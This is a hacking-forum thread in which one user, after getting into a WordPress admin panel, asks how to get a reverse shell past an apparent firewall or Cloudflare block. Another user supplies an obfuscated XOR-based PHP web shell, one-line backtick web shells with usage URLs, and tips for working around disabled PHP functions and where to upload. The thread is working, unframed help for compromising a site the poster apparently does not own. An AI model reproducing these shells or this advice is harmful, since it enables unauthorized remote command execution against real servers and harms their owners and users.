wp-admin - Wordpress Reverse Shell

[DanteXDark]

sup guys, so i got access to wp-admin panel and i uploaded my reverse shell in one of the php files (404.php) when i tried to access it, i got connection from the server but within 0.5 sec connection was closed, then i uploaded a simple web shell to verify that i can execute commands on server but then i got cloudflair error shown in the image below. I think firewall is blocking outbound connection. soo is there any way to bypass this ? if yes then pls suggest Thank YOU

 

[c0d3x]

Try this shell:

<?php
$_="{"; $_=($_^"<").($_^">;").($_^"/"); ${'_'.$_}["-_"](${'_'.$_}["-__"]);

Usage: /shell.php?-_=system&-__=whoami

And say response code (500, 400 etc.)

 

[DanteXDark]

Try this shell:
Hidden content
And say response code (500, 400 etc.)

nop no output, i think because of cloudflair i am not getting response

 

[c0d3x]

i am not getting response

Look in response headers in browser.

 

[DanteXDark]

Look in response headers in browser.

what we are looking for in response headers ?

 

[c0d3x]

what we are looking for in response headers ?

Response code and specific custom headers.
And try upload:

<?php
phpinfo();
?>

It's work?

 

[DanteXDark]

Response code and specific custom headers.
And try upload:

<?php
phpinfo();
>

It's work?

no not working, just blank page, i think cloudflair is the main issue here ? what you think ?

 

[c0d3x]

i think cloudflair is the main issue here ? what you think ?

if it doesn't work:

<?php
phpinfo();
?>

Then it's not about CloudFlare. Try upload phpinfo to the root or other directory of the site. Or it's may be disabled with other functions (system, shell_exec, passthru, exec, phpinfo, popen, proc_open etc.) in php.ini, then try:

<?=`$_GET[0]`?>

Usage: /shell.php?0=whoami

<?=`{$_REQUEST['_']}`?>

Usage: /shell.php?_=whoami

 

[DanteXDark]

if it doesn't work:

<?php
phpinfo();
?>

Then it's not about CloudFlare. Try upload phpinfo to the root or other directory of the site. Or it's may be disabled with other functions (system, shell_exec, passthru, exec, phpinfo, popen, proc_open etc.) in php.ini, then try:

<?=`$_GET[0]`?>

Usage: /shell.php?0=whoami

<?=`{$_REQUEST['_']}`?>

Usage: /shell.php?_=whoami

ok soo you mean i need to upload php shell in root directory. ok so what i did is i changed 404.php (of other theme which is not activated on site [twenty twenty]) code with php shell code.
but now i will try with root directory